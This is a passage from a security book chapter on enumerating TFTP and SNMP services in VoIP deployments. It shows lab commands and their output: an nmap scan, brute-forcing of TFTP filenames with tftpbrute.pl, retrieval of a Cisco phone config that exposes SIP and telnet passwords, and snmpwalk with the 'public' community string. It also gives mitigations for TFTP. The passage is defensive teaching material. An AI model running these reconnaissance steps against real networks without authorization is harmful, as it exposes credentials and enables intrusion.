Enumeration of Other Voip Support Services

Previous page
Table of content
Next page

Obviously, VoIP platforms rely on a plethora of common network services such as DNS, Microsoft Active Directory, LDAP, RADIUS, and so on. Enumerating most of these common services from a typical security auditing perspective is already covered in great detail in the main Hacking Exposed, Fifth Edition book, which we highly recommend reading. Rather than reiterate a lot of general security enumeration techniques already covered elsewhere, we've tried to limit the scope of this section to enumerating those main support services that most VoIP devices rely on.

Attack Enumerating TFTP Servers

Popularity:

5

Simplicity:

9

Impact:

9

Risk Rating:

7

The majority of the phones that we set up in our test environment rely upon a Trivial File Transfer Protocol (TFTP) server for downloading their configuration settings. TFTP is dangerously insecure in that it requires no authentication to upload or fetch a file. This means that in the majority of enterprise VoIP installations, a TFTP server is typically exposed to the network so phones can download their initial settings each time they power up.

When booting up each time, many phones first try to download a configuration file. Sometimes this configuration file is a derivative of the phone's MAC address. For instance, our Avaya 4620 phone tries to download the files 46xxsettings.txt and 46xxupgrade.scr each time it is powered on. Our Cisco 7912 IP phone tries to download the files SIPDefault.cnf and SEP001562EA69E8.cnf (001562EA69E8 is its MAC address) each time from the same TFTP server. One of the easiest ways for a hacker to compromise a VoIP network is to focus first on the TFTP servers.

The first step to enumerating the files on a TFTP server is locating the server within the network. As you saw in the Googling exercises in Chapter 1, this might be as easy as reading the TFTP server IP address from the web-based configuration readout. As a refresher, let's scan our target deployment again simply looking for listening services on UDP port 69 (tftp): 

 Starting nmap 3.81 (http://www.insecure.org/nmap/) at 2006-03-07 01:56 CST Interesting ports on 192.168.1.21: PORT STATE SERVICE 69/udp closed tftp MAC Address: 00:04:13:24:23:8D (Snom Technology AG) Interesting ports on 192.168.1.22: PORT STATE SERVICE 69/udp openfiltered tftp MAC Address: 00:0F:34:11:80:45 (Cisco Systems) Interesting ports on 192.168.1.23: PORT STATE SERVICE 69/udp closed tftp MAC Address: 00:15:62:86:BA:3E (Unknown) Interesting ports on 192.168.1.24: PORT STATE SERVICE 69/udp closed tftp MAC Address: 00:0E:08:DA:DA:17 (Sipura Technology) Interesting ports on 192.168.1.25: PORT STATE SERVICE 69/udp closed tftp MAC Address: 00:0B:82:06:4D:37 (Grandstream Networks) Interesting ports on 192.168.1.27: PORT STATE SERVICE 69/udp openfiltered tftp MAC Address: 00:04:F2:03:15:46 (Circa Communications) Interesting ports on 192.168.1.51: PORT STATE SERVICE 69/udp closed tftp MAC Address: 00:04:13:23:34:95 (Snom Technology AG) Interesting ports on 192.168.1.53: PORT STATE SERVICE 69/udp closed tftp MAC Address: 00:04:0D:50:40:B0 (Avaya) Interesting ports on 192.168.1.54: PORT STATE SERVICE 69/udp closed tftp MAC Address: 00:0E:08:DA:24:AE (Sipura Technology) Interesting ports on 192.168.1.55: PORT STATE SERVICE 69/udp openfiltered tftp MAC Address: 00:E0:11:03:03:97 (Uniden SAN Diego R&D Center) Interesting ports on 192.168.1.57: PORT STATE SERVICE 69/udp openfiltered tftp MAC Address: 00:01:E1:02:C8:DB (Kinpo Electronics) Interesting ports on 192.168.1.103: PORT STATE SERVICE 69/udp openfiltered tftp MAC Address: 00:09:7A:44:15:DB (Louis Design Labs.) Interesting ports on domain2 (192.168.1.104): PORT STATE SERVICE 69/udp closed tftp

As you can see, we found a TFTP server on 192.168.1.103 (also our Asterisk server). Most automated banner- grabbing utilities will identify the TFTP service running on this server. The reason we wanted to run Nmap again is to remind you that the MAC addresses we'll shortly need for enumerating some of the configuration filenames are all available from these scanning results.

As opposed to normal FTP, TFTP provides no mechanism for a directory listing (in other words, no "ls"). This means that unless you already know the names of the files you wish to download, you're out of luck figuring out what else is sitting in the same directory. This is where the MAC addresses will come in handy because we know the general format for Cisco and other phone configuration files is often based on the MAC address. Through brute-force trial-and-error, you can enumerate and download many of the configuration files on a TFTP server.

 Companion Web Site   We have provided an up-to-date list of configuration filenames on our website (http://www.hackingvoip.com) for use with manual or automated TFTP enumeration. Obviously, you will need to modify some of the names with the appropriate MAC addresses gleaned from your own scanning.

Here's an example of enumerating our TFTP server manually by tweaking the list of brute-forcing names we've provided. We use a tool called TFTPbrute.pl, which was written by our colleagues who authored the book, Hacking Exposed Cisco Networks   (McGraw-Hill, 2006). The tool is available for download from http://www.hackingexposedcisco.com/tools. 

 [root@attacker]# perl tftpbrute.pl 192.168.1.103 brutefile.txt 100 tftpbrute.pl, , V 0.1 TFTP file word database: brutefile.txt TFTP server 192.168.1.103 Max processes 100  Processes are: 1  Processes are: 2  Processes are: 3  Processes are: 4  Processes are: 5  Processes are: 6  Processes are: 7  Processes are: 8  Processes are: 9  Processes are: 10  Processes are: 11  Processes are: 12 *** Found TFTP server remote filename : sip.cfg *** Found TFTP server remote filename : 46xxsettings.txt  Processes are: 13  Processes are: 14 *** Found TFTP server remote filename : sip_4602D02A.txt *** Found TFTP server remote filename : XMLDefault.cnf.xml *** Found TFTP server remote filename : SipDefault.cnf *** Found TFTP server remote filename : SEP001562EA69E8.cnf

Now that we know the name of the configuration file to the target 7960 Cisco IP Phone, we can download it and look for any useful information. For example: 

 [root@attacker]# tftp 192.168.1.103 tftp> get SEP001562EA69E8.cnf [root@attacker]# cat SEP001562EA69E8.cnf # SIP Configuration Generic File (start) # Line 1 Settings line1_name: "502"                       ; Line 1 Extension\User ID line1_displayname: "502"                ; Line 1 Display Name line1_authname: "502"                   ; Line 1 Registration Authentication line1_password: "1234"                  ; Line 1 Registration Password # Line 2 Settings line2_name: ""                          ; Line 2 Extension\User ID line2_displayname: ""                   ; Line 2 Display Name line2_authname: "UNPROVISIONED"         ; Line 2 Registration Authentication line2_password: "UNPROVISIONED"         ; Line 2 Registration Password # Line 3 Settings line3_name: ""                          ; Line 3 Extension\User ID line3_displayname: ""                   ; Line 3 Display Name line3_authname: "UNPROVISIONED"         ; Line 3 Registration Authentication line3_password: "UNPROVISIONED"         ; Line 3 Registration Password # Line 4 Settings line4_name: ""                          ; Line 4 Extension\User ID line4_displayname: ""                   ; Line 4 Display Name line4_authname: "UNPROVISIONED"         ; Line 4 Registration Authentication line4_password: "UNPROVISIONED"         ; Line 4 Registration Password # Line 5 Settings line5_name: ""                          ; Line 5 Extension\User ID line5_displayname: ""                   ; Line 5 Display Name line5_authname: "UNPROVISIONED"         ; Line 5 Registration Authentication line5_password: "UNPROVISIONED"         ; Line 5 Registration Password # Line 6 Settings line6_name: ""                          ; Line 6 Extension\User ID line6_displayname: ""                   ; Line 6 Display Name line6_authname: "UNPROVISIONED"         ; Line 6 Registration Authentication line6_password: "UNPROVISIONED"         ; Line 6 Registration Password # NAT/Firewall Traversal nat_address: "" voip_control_port: "5060" start_media_port: "16384" end_media_port: "32766" # Phone Label (Text desired to be displayed in upper right corner) phone_label: "cisco 7960"            ; Has no effect on SIP messaging # Time Zone phone will reside in time_zone: EST # Phone prompt/password for telnet/console session phone_prompt: "Cisco7960"                      ; Telnet/Console Prompt phone_password: "abc"                          ; Telnet/Console Password # SIP Configuration Generic File (stop)

Yikes! Not only does an attacker now know the SIP username and password for this user/phone, but also the administrative password for the telnet service, which also happens to be enabled on this phone.

Note 

Security researcher Ofir Arkin was one of the first to document many of these types of attacks against a Cisco environment in his paper "The Trivial Cisco IP Phones Compromise" (http://www.sys-security.com/archive/papers/The_Trivial_Cisco_IP_Phones_Compromise.pdf).

Countermeasurs TFTP Enumeration Countermeasures

While an easy recommendation would be to avoid using TFTP in your VoIP environment, the reality is that many VoIP phones require it and give you no other choice for upgrading or configuration changes. Some of the newer models are beginning to migrate to web configuration instead; however, TFTP will be a necessary evil for the foreseeable future.

Two tips to mitigate the threat of TFTP enumeration include the following:

  • Restrict access to TFTP servers by using firewall rules that only allow certain IP address ranges to contact the TFTP server. This prevents arbitrary scanning; however, UDP source addresses can be spoofed.

  • Segment the IP phones, TFTP servers, SIP servers, and general VoIP support infrastructure on a separate switched VLAN.

Attack SNMP Enumeration

Popularity:

7

Simplicity:

7

Impact:

10

Risk Rating:

8

Simple Network Management Protocol (SNMP) version 1 is another inherently insecure protocol used by many VoIP devices, as you learned in Chapter 2. Let's use Nmap again to see if we can find any devices that support it. Because SNMP typically listens on UDP port 162, we'll start off with 

 [root@domain2 ~]# nmap -sU 192.168.1.1-254 -p 162

Or you can use a graphical SNMP probing tool such as SolarWinds SNMPSweep, as shown in Figure 3-8.

image from book
Figure 3-8: SNMPSweep shows that the Avaya IP phone and Zultys Zip2 phone both responded to SNMP probes with the "public" community string.

Based on the information shown in the figure, we now use the "public" community string to enumerate most of the configuration settings on those phones. The tool snmpwalk (http://net-snmp. sourceforge .net/docs/man/snmpwalk.html) is useful for such a task: 

 [root@domain2 ~]# snmpwalk -c public -v 1 192.168.1.53 SNMPv2-MIB::sysDescr.0 = STRING: VxWorks SNMPv1/v2c Agent SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.6889.1.69.1.5 SNMPv2-MIB::sysUpTime.0 = Timeticks: (207512) 0:34:35.12 SNMPv2-MIB::sysContact.0 = STRING: Wind River Systems SNMPv2-MIB::sysName.0 = STRING: AV SNMPv2-MIB::sysLocation.0 = STRING: Planet Earth SNMPv2-MIB::sysServices.0 = INTEGER: 79 IF-MIB::ifNumber.0 = INTEGER: 2 IF-MIB::ifIndex.1 = INTEGER: 1 IF-MIB::ifIndex.2 = INTEGER: 2 IF-MIB::ifDescr.1 = STRING: Avaya0 IF-MIB::ifDescr.2 = STRING: lo0 IF-MIB::ifType.1 = INTEGER: ethernetCsmacd(6) IF-MIB::ifType.2 = INTEGER: softwareLoopback(24) IF-MIB::ifMtu.1 = INTEGER: 1500 IF-MIB::ifMtu.2 = INTEGER: 32768 IF-MIB::ifSpeed.1 = Gauge32: 10000000 IF-MIB::ifSpeed.2 = Gauge32: 0 IF-MIB::ifPhysAddress.1 = STRING: 0:4:d:50:40:b0 IF-MIB::ifPhysAddress.2 = STRING: IF-MIB::ifAdminStatus.1 = INTEGER: up(1) IF-MIB::ifAdminStatus.2 = INTEGER: up(1) IF-MIB::ifOperStatus.1 = INTEGER: up(1) IF-MIB::ifOperStatus.2 = INTEGER: up(1) IF-MIB::ifLastChange.1 = Timeticks: (0) 0:00:00.00 IF-MIB::ifLastChange.2 = Timeticks: (0) 0:00:00.00 IF-MIB::ifInOctets.1 = Counter32: 0 IF-MIB::ifInOctets.2 = Counter32: 0 IF-MIB::ifInUcastPkts.1 = Counter32: 736 IF-MIB::ifInUcastPkts.2 = Counter32: 106 IF-MIB::ifInNUcastPkts.1 = Counter32: 99 IF-MIB::ifInNUcastPkts.2 = Counter32: 0 IF-MIB::ifInDiscards.1 = Counter32: 0 IF-MIB::ifInDiscards.2 = Counter32: 0 IF-MIB::ifInErrors.1 = Counter32: 0 IF-MIB::ifInErrors.2 = Counter32: 0 IF-MIB::ifInUnknownProtos.1 = Counter32: 0 IF-MIB::ifInUnknownProtos.2 = Counter32: 0 IF-MIB::ifOutOctets.1 = Counter32: 0 IF-MIB::ifOutOctets.2 = Counter32: 0 IF-MIB::ifOutUcastPkts.1 = Counter32: 742 IF-MIB::ifOutUcastPkts.2 = Counter32: 106 IF-MIB::ifOutNUcastPkts.1 = Counter32: 4 IF-MIB::ifOutNUcastPkts.2 = Counter32: 0 IF-MIB::ifOutDiscards.1 = Counter32: 0 IF-MIB::ifOutDiscards.2 = Counter32: 0 IF-MIB::ifOutErrors.1 = Counter32: 0 IF-MIB::ifOutErrors.2 = Counter32: 0 IF-MIB::ifOutQLen.1 = Gauge32: 0 IF-MIB::ifOutQLen.2 = Gauge32: 0 IF-MIB::ifSpecific.1 = OID: SNMPv2-SMI::zeroDotZero IF-MIB::ifSpecific.2 = OID: SNMPv2-SMI::zeroDotZero IP-MIB::ipForwarding.0 = INTEGER: forwarding(1) IP-MIB::ipDefaultTTL.0 = INTEGER: 64 IP-MIB::ipInReceives.0 = Counter32: 864 IP-MIB::ipInHdrErrors.0 = Counter32: 0 IP-MIB::ipInAddrErrors.0 = Counter32: 0 IP-MIB::ipForwDatagrams.0 = Counter32: 0 IP-MIB::ipInUnknownProtos.0 = Counter32: 1 IP-MIB::ipInDiscards.0 = Counter32: 0 IP-MIB::ipInDelivers.0 = Counter32: 869 IP-MIB::ipOutRequests.0 = Counter32: 857 IP-MIB::ipOutDiscards.0 = Counter32: 0 IP-MIB::ipOutNoRoutes.0 = Counter32: 0 IP-MIB::ipReasmTimeout.0 = INTEGER: 60 IP-MIB::ipReasmReqds.0 = Counter32: 0 IP-MIB::ipReasmOKs.0 = Counter32: 0 IP-MIB::ipReasmFails.0 = Counter32: 0 IP-MIB::ipFragOKs.0 = Counter32: 0 IP-MIB::ipFragFails.0 = Counter32: 0 IP-MIB::ipFragCreates.0 = Counter32: 0 IP-MIB::ipAdEntAddr.127.0.0.1 = IpAddress: 127.0.0.1 IP-MIB::ipAdEntAddr.192.168.1.53 = IpAddress: 192.168.1.53 IP-MIB::ipAdEntIfIndex.127.0.0.1 = INTEGER: 2 IP-MIB::ipAdEntIfIndex.192.168.1.53 = INTEGER: 1 IP-MIB::ipAdEntNetMask.127.0.0.1 = IpAddress: 255.0.0.0 IP-MIB::ipAdEntNetMask.192.168.1.53 = IpAddress: 255.255.255.0 IP-MIB::ipAdEntBcastAddr.127.0.0.1 = INTEGER: 1 IP-MIB::ipAdEntBcastAddr.192.168.1.53 = INTEGER: 1 IP-MIB::ipAdEntReasmMaxSize.127.0.0.1 = INTEGER: 65535 IP-MIB::ipAdEntReasmMaxSize.192.168.1.53 = INTEGER: 65535 RFC1213-MIB::ipRouteDest.0.0.0.0 = IpAddress: 0.0.0.0 RFC1213-MIB::ipRouteDest.24.93.41.125 = IpAddress: 24.93.41.125 RFC1213-MIB::ipRouteDest.127.0.0.1 = IpAddress: 127.0.0.1 RFC1213-MIB::ipRouteDest.192.168.1.0 = IpAddress: 192.168.1.0 RFC1213-MIB::ipRouteIfIndex.0.0.0.0 = INTEGER: 1 RFC1213-MIB::ipRouteIfIndex.24.93.41.125 = INTEGER: 1 RFC1213-MIB::ipRouteIfIndex.127.0.0.1 = INTEGER: 2 RFC1213-MIB::ipRouteIfIndex.192.168.1.0 = INTEGER: 1 RFC1213-MIB::ipRouteMetric1.0.0.0.0 = INTEGER: 1 RFC1213-MIB::ipRouteMetric1.24.93.41.125 = INTEGER: 1 RFC1213-MIB::ipRouteMetric1.127.0.0.1 = INTEGER: 0 RFC1213-MIB::ipRouteMetric1.192.168.1.0 = INTEGER: 0 RFC1213-MIB::ipRouteMetric2.0.0.0.0 = INTEGER: -1 RFC1213-MIB::ipRouteMetric2.24.93.41.125 = INTEGER: -1 RFC1213-MIB::ipRouteMetric2.127.0.0.1 = INTEGER: -1 RFC1213-MIB::ipRouteMetric2.192.168.1.0 = INTEGER: -1 RFC1213-MIB::ipRouteMetric3.0.0.0.0 = INTEGER: -1 RFC1213-MIB::ipRouteMetric3.24.93.41.125 = INTEGER: -1 RFC1213-MIB::ipRouteMetric3.127.0.0.1 = INTEGER: -1 RFC1213-MIB::ipRouteMetric3.192.168.1.0 = INTEGER: -1 RFC1213-MIB::ipRouteMetric4.0.0.0.0 = INTEGER: -1 RFC1213-MIB::ipRouteMetric4.24.93.41.125 = INTEGER: -1 RFC1213-MIB::ipRouteMetric4.127.0.0.1 = INTEGER: -1 RFC1213-MIB::ipRouteMetric4.192.168.1.0 = INTEGER: -1 RFC1213-MIB::ipRouteNextHop.0.0.0.0 = IpAddress: 192.168.1.1 RFC1213-MIB::ipRouteNextHop.24.93.41.125 = IpAddress: 192.168.1.1 RFC1213-MIB::ipRouteNextHop.127.0.0.1 = IpAddress: 127.0.0.1 RFC1213-MIB::ipRouteNextHop.192.168.1.0 = IpAddress: 192.168.1.53 RFC1213-MIB::ipRouteType.0.0.0.0 = INTEGER: indirect(4) RFC1213-MIB::ipRouteType.24.93.41.125 = INTEGER: indirect(4) RFC1213-MIB::ipRouteType.127.0.0.1 = INTEGER: direct(3) RFC1213-MIB::ipRouteType.192.168.1.0 = INTEGER: direct(3) RFC1213-MIB::ipRouteProto.0.0.0.0 = INTEGER: other(1) RFC1213-MIB::ipRouteProto.24.93.41.125 = INTEGER: local(2) RFC1213-MIB::ipRouteProto.127.0.0.1 = INTEGER: local(2) RFC1213-MIB::ipRouteProto.192.168.1.0 = INTEGER: local(2) RFC1213-MIB::ipRouteAge.0.0.0.0 = INTEGER: 2067 RFC1213-MIB::ipRouteAge.24.93.41.125 = INTEGER: 2025 RFC1213-MIB::ipRouteAge.127.0.0.1 = INTEGER: 2079 RFC1213-MIB::ipRouteAge.192.168.1.0 = INTEGER: 2068 RFC1213-MIB::ipRouteMask.0.0.0.0 = IpAddress: 0.0.0.0 RFC1213-MIB::ipRouteMask.24.93.41.125 = IpAddress: 255.255.255.255 RFC1213-MIB::ipRouteMask.127.0.0.1 = IpAddress: 255.255.255.255 RFC1213-MIB::ipRouteMask.192.168.1.0 = IpAddress: 255.255.255.0 RFC1213-MIB::ipRouteMetric5.0.0.0.0 = INTEGER: -1 RFC1213-MIB::ipRouteMetric5.24.93.41.125 = INTEGER: -1 RFC1213-MIB::ipRouteMetric5.127.0.0.1 = INTEGER: -1 RFC1213-MIB::ipRouteMetric5.192.168.1.0 = INTEGER: -1 RFC1213-MIB::ipRouteInfo.0.0.0.0 = OID: SNMPv2-SMI::zeroDotZero RFC1213-MIB::ipRouteInfo.24.93.41.125 = OID: SNMPv2-SMI::zeroDotZero RFC1213-MIB::ipRouteInfo.127.0.0.1 = OID: SNMPv2-SMI::zeroDotZero RFC1213-MIB::ipRouteInfo.192.168.1.0 = OID: SNMPv2-SMI::zeroDotZero IP-MIB::ipNetToMediaIfIndex.1.192.168.1.104 = INTEGER: 1 IP-MIB::ipNetToMediaIfIndex.2.192.168.1.53 = INTEGER: 2 IP-MIB::ipNetToMediaPhysAddress.1.192.168.1.104 = STRING: 0:9:7a:44:17:d9 IP-MIB::ipNetToMediaPhysAddress.2.192.168.1.53 = STRING: 0:4:d:50:40:b0 IP-MIB::ipNetToMediaNetAddress.1.192.168.1.104 = IpAddress: 192.168.1.104 IP-MIB::ipNetToMediaNetAddress.2.192.168.1.53 = IpAddress: 192.168.1.53 IP-MIB::ipNetToMediaType.1.192.168.1.104 = INTEGER: dynamic(3) IP-MIB::ipNetToMediaType.2.192.168.1.53 = INTEGER: static(4) IP-MIB::ipRoutingDiscards.0 = Counter32: 0 IP-MIB::icmpInMsgs.0 = Counter32: 4 IP-MIB::icmpInErrors.0 = Counter32: 0 IP-MIB::icmpInDestUnreachs.0 = Counter32: 1 IP-MIB::icmpInTimeExcds.0 = Counter32: 0 IP-MIB::icmpInParmProbs.0 = Counter32: 0 IP-MIB::icmpInSrcQuenchs.0 = Counter32: 0 IP-MIB::icmpInRedirects.0 = Counter32: 0 IP-MIB::icmpInEchos.0 = Counter32: 3 IP-MIB::icmpInEchoReps.0 = Counter32: 0 IP-MIB::icmpInTimestamps.0 = Counter32: 0 IP-MIB::icmpInTimestampReps.0 = Counter32: 0 IP-MIB::icmpInAddrMasks.0 = Counter32: 0 IP-MIB::icmpInAddrMaskReps.0 = Counter32: 0 IP-MIB::icmpOutMsgs.0 = Counter32: 27 IP-MIB::icmpOutErrors.0 = Counter32: 24 IP-MIB::icmpOutDestUnreachs.0 = Counter32: 24 IP-MIB::icmpOutTimeExcds.0 = Counter32: 0 IP-MIB::icmpOutParmProbs.0 = Counter32: 0 IP-MIB::icmpOutSrcQuenchs.0 = Counter32: 0 IP-MIB::icmpOutRedirects.0 = Counter32: 0 IP-MIB::icmpOutEchos.0 = Counter32: 0 IP-MIB::icmpOutEchoReps.0 = Counter32: 3 IP-MIB::icmpOutTimestamps.0 = Counter32: 0 IP-MIB::icmpOutTimestampReps.0 = Counter32: 0 IP-MIB::icmpOutAddrMasks.0 = Counter32: 0 IP-MIB::icmpOutAddrMaskReps.0 = Counter32: 0 TCP-MIB::tcpRtoAlgorithm.0 = INTEGER: vanj(4) TCP-MIB::tcpRtoMin.0 = INTEGER: 1000 milliseconds TCP-MIB::tcpRtoMax.0 = INTEGER: 64000 milliseconds TCP-MIB::tcpMaxConn.0 = INTEGER: -1 TCP-MIB::tcpActiveOpens.0 = Counter32: 6 TCP-MIB::tcpPassiveOpens.0 = Counter32: 4 TCP-MIB::tcpAttemptFails.0 = Counter32: 1 TCP-MIB::tcpEstabResets.0 = Counter32: 0 TCP-MIB::tcpCurrEstab.0 = Gauge32: 0 TCP-MIB::tcpInSegs.0 = Counter32: 96 TCP-MIB::tcpOutSegs.0 = Counter32: 99 TCP-MIB::tcpRetransSegs.0 = Counter32: 0 TCP-MIB::tcpInErrs.0 = Counter32: 0 TCP-MIB::tcpOutRsts.0 = Counter32: 0 UDP-MIB::udpInDatagrams.0 = Counter32: 890 UDP-MIB::udpNoPorts.0 = Counter32: 26 UDP-MIB::udpInErrors.0 = Counter32: 0 UDP-MIB::udpOutDatagrams.0 = Counter32: 855 UDP-MIB::udpLocalAddress.0.0.0.0.68 = IpAddress: 0.0.0.0 UDP-MIB::udpLocalAddress.0.0.0.0.161 = IpAddress: 0.0.0.0 UDP-MIB::udpLocalAddress.0.0.0.0.1031 = IpAddress: 0.0.0.0 UDP-MIB::udpLocalAddress.0.0.0.0.1033 = IpAddress: 0.0.0.0 UDP-MIB::udpLocalAddress.0.0.0.0.5060 = IpAddress: 0.0.0.0 UDP-MIB::udpLocalAddress.0.0.0.0.10000 = IpAddress: 0.0.0.0 UDP-MIB::udpLocalAddress.127.0.0.1.1032 = IpAddress: 127.0.0.1 UDP-MIB::udpLocalPort.0.0.0.0.68 = INTEGER: 68 UDP-MIB::udpLocalPort.0.0.0.0.161 = INTEGER: 161 UDP-MIB::udpLocalPort.0.0.0.0.1031 = INTEGER: 1031 UDP-MIB::udpLocalPort.0.0.0.0.1033 = INTEGER: 1033 UDP-MIB::udpLocalPort.0.0.0.0.5060 = INTEGER: 5060 UDP-MIB::udpLocalPort.0.0.0.0.10000 = INTEGER: 10000 UDP-MIB::udpLocalPort.127.0.0.1.1032 = INTEGER: 1032 SNMPv2-MIB::snmpInPkts.0 = Counter32: 799 SNMPv2-MIB::snmpOutPkts.0 = Counter32: 788 SNMPv2-MIB::snmpInBadVersions.0 = Counter32: 6 SNMPv2-MIB::snmpInBadCommunityNames.0 = Counter32: 6 SNMPv2-MIB::snmpInBadCommunityUses.0 = Counter32: 0 SNMPv2-MIB::snmpInASNParseErrs.0 = Counter32: 0 SNMPv2-MIB::snmpInTooBigs.0 = Counter32: 0 SNMPv2-MIB::snmpInNoSuchNames.0 = Counter32: 0 SNMPv2-MIB::snmpInBadValues.0 = Counter32: 0 SNMPv2-MIB::snmpInReadOnlys.0 = Counter32: 0 SNMPv2-MIB::snmpInGenErrs.0 = Counter32: 0 SNMPv2-MIB::snmpInTotalReqVars.0 = Counter32: 1067 SNMPv2-MIB::snmpInTotalSetVars.0 = Counter32: 0 SNMPv2-MIB::snmpInGetRequests.0 = Counter32: 22 SNMPv2-MIB::snmpInGetNexts.0 = Counter32: 749 SNMPv2-MIB::snmpInSetRequests.0 = Counter32: 0 SNMPv2-MIB::snmpInGetResponses.0 = Counter32: 0 SNMPv2-MIB::snmpInTraps.0 = Counter32: 0 SNMPv2-MIB::snmpOutTooBigs.0 = Counter32: 0 SNMPv2-MIB::snmpOutNoSuchNames.0 = Counter32: 0 SNMPv2-MIB::snmpOutBadValues.0 = Counter32: 0 SNMPv2-MIB::snmpOutGenErrs.0 = Counter32: 0 SNMPv2-MIB::snmpOutGetRequests.0 = Counter32: 0 SNMPv2-MIB::snmpOutGetNexts.0 = Counter32: 0 SNMPv2-MIB::snmpOutSetRequests.0 = Counter32: 0 SNMPv2-MIB::snmpOutGetResponses.0 = Counter32: 811 SNMPv2-MIB::snmpOutTraps.0 = Counter32: 1 SNMPv2-MIB::snmpEnableAuthenTraps.0 = INTEGER: disabled(2) SNMPv2-MIB::snmpSilentDrops.0 = Counter32: 0 SNMPv2-MIB::snmpProxyDrops.0 = Counter32: 0 IF-MIB::ifName.1 = STRING: IF-MIB::ifName.2 = STRING: IF-MIB::ifInMulticastPkts.1 = Counter32: 0 IF-MIB::ifInMulticastPkts.2 = Counter32: 0 IF-MIB::ifInBroadcastPkts.1 = Counter32: 0 IF-MIB::ifInBroadcastPkts.2 = Counter32: 0 IF-MIB::ifOutMulticastPkts.1 = Counter32: 0 IF-MIB::ifOutMulticastPkts.2 = Counter32: 0 IF-MIB::ifOutBroadcastPkts.1 = Counter32: 0 IF-MIB::ifOutBroadcastPkts.2 = Counter32: 0 IF-MIB::ifLinkUpDownTrapEnable.1 = INTEGER: disabled(2) IF-MIB::ifLinkUpDownTrapEnable.2 = INTEGER: disabled(2) IF-MIB::ifHighSpeed.1 = Gauge32: 0 IF-MIB::ifHighSpeed.2 = Gauge32: 0 IF-MIB::ifPromiscuousMode.1 = INTEGER: false(2) IF-MIB::ifPromiscuousMode.2 = INTEGER: false(2) IF-MIB::ifConnectorPresent.1 = INTEGER: false(2) IF-MIB::ifConnectorPresent.2 = INTEGER: false(2) IF-MIB::ifAlias.1 = STRING: IF-MIB::ifAlias.2 = STRING: IF-MIB::ifCounterDiscontinuityTime.1 = Timeticks: (0) 0:00:00.00 IF-MIB::ifCounterDiscontinuityTime.2 = Timeticks: (0) 0:00:00.00 IF-MIB::ifStackStatus.0.1 = INTEGER: active(1) IF-MIB::ifStackStatus.0.2 = INTEGER: active(1) IF-MIB::ifStackStatus.1.0 = INTEGER: active(1) IF-MIB::ifStackStatus.2.0 = INTEGER: active(1) IF-MIB::ifRcvAddressStatus.1."...P@." = INTEGER: active(1) IF-MIB::ifRcvAddressType.1."...P@." = INTEGER: nonVolatile(3) IF-MIB::ifTableLastChange.0 = Timeticks: (0) 0:00:00.00 IF-MIB::ifStackLastChange.0 = Timeticks: (0) 0:00:00.00

The SNMP MIB exposes interesting configuration information about the Avaya phone, including its vendor type (Avaya), underlying operating system (VxWorks), MAC address, and ports of possible UDP- related services that might be of interest for further enumeration (68, 161, 1031, 1032, 1033, 5060). Now that we know this is an Avaya phone, we can easily find specific SNMP MIB information for this manufacturer from Google to query for further information on this device. You can also use Solarwinds' graphical tool, SNMP MIB browser, which has a built-in MIB database and is shown in Figure 3-9. We eventually determine that 1.3.6.1.4.1.6889 is the appropriate SNMP OID, which we can use for another, more detailed SNMP query:

image from book
Figure 3-9: SolarWind's MIB browser finding the Avaya OID 
 [root@domain2 ~]# snmpwalk -c public -v 1 192.168.1.53 1.3.6.1.4.1.6889 SNMPv2-SMI::enterprises.6889.2.69.1.1.1.0 = STRING: "Obsolete" SNMPv2-SMI::enterprises.6889.2.69.1.1.2.0 = STRING: "4620D01B" SNMPv2-SMI::enterprises.6889.2.69.1.1.3.0 = STRING: "AvayaCallserver" SNMPv2-SMI::enterprises.6889.2.69.1.1.4.0 = IpAddress: 192.168.1.104 SNMPv2-SMI::enterprises.6889.2.69.1.1.5.0 = INTEGER: 1719 SNMPv2-SMI::enterprises.6889.2.69.1.1.6.0 = STRING: "051612501065" SNMPv2-SMI::enterprises.6889.2.69.1.1.7.0 = STRING: "700316698" SNMPv2-SMI::enterprises.6889.2.69.1.1.8.0 = STRING: "051611403489" SNMPv2-SMI::enterprises.6889.2.69.1.1.9.0 = STRING: "00:04:0D:50:40:B0" SNMPv2-SMI::enterprises.6889.2.69.1.1.10.0 = STRING: "100" SNMPv2-SMI::enterprises.6889.2.69.1.1.11.0 = IpAddress: 192.168.1.53 SNMPv2-SMI::enterprises.6889.2.69.1.1.12.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.1.13.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.1.14.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.1.15.0 = STRING: "192.168.1.1" SNMPv2-SMI::enterprises.6889.2.69.1.1.16.0 = IpAddress: 192.168.1.1 SNMPv2-SMI::enterprises.6889.2.69.1.1.17.0 = IpAddress: 255.255.255.0 SNMPv2-SMI::enterprises.6889.2.69.1.1.18.0 = "" SNMPv2-SMI::enterprises.6889.2.69.1.1.19.0 = STRING: "192.168.1.104" SNMPv2-SMI::enterprises.6889.2.69.1.1.20.0 = IpAddress: 192.168.1.104 SNMPv2-SMI::enterprises.6889.2.69.1.1.21.0 = STRING: "b20d01b2_3.bin" SNMPv2-SMI::enterprises.6889.2.69.1.1.22.0 = STRING: "s20d01b2_2.bin" SNMPv2-SMI::enterprises.6889.2.69.1.1.23.0 = INTEGER: -1 SNMPv2-SMI::enterprises.6889.2.69.1.1.24.0 = INTEGER: -1 SNMPv2-SMI::enterprises.6889.2.69.1.1.25.0 = INTEGER: -1 SNMPv2-SMI::enterprises.6889.2.69.1.1.26.0 = INTEGER: 46 SNMPv2-SMI::enterprises.6889.2.69.1.1.27.0 = INTEGER: 34 SNMPv2-SMI::enterprises.6889.2.69.1.1.28.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.1.29.0 = INTEGER: 6 SNMPv2-SMI::enterprises.6889.2.69.1.1.30.0 = INTEGER: 6 SNMPv2-SMI::enterprises.6889.2.69.1.1.31.0 = INTEGER: 0 SNMPv2-SMI::enterprises.6889.2.69.1.1.32.0 = STRING: "46xxupgrade.scr" SNMPv2-SMI::enterprises.6889.2.69.1.1.33.0 = STRING: "24.93.41.125" SNMPv2-SMI::enterprises.6889.2.69.1.1.34.0 = STRING: "Obsolete" SNMPv2-SMI::enterprises.6889.2.69.1.1.35.0 = STRING: "domain2" SNMPv2-SMI::enterprises.6889.2.69.1.1.36.0 = IpAddress: 0.0.0.0 SNMPv2-SMI::enterprises.6889.2.69.1.1.37.0 = INTEGER: 1 SNMPv2-SMI::enterprises.6889.2.69.1.1.38.0 = INTEGER: 0 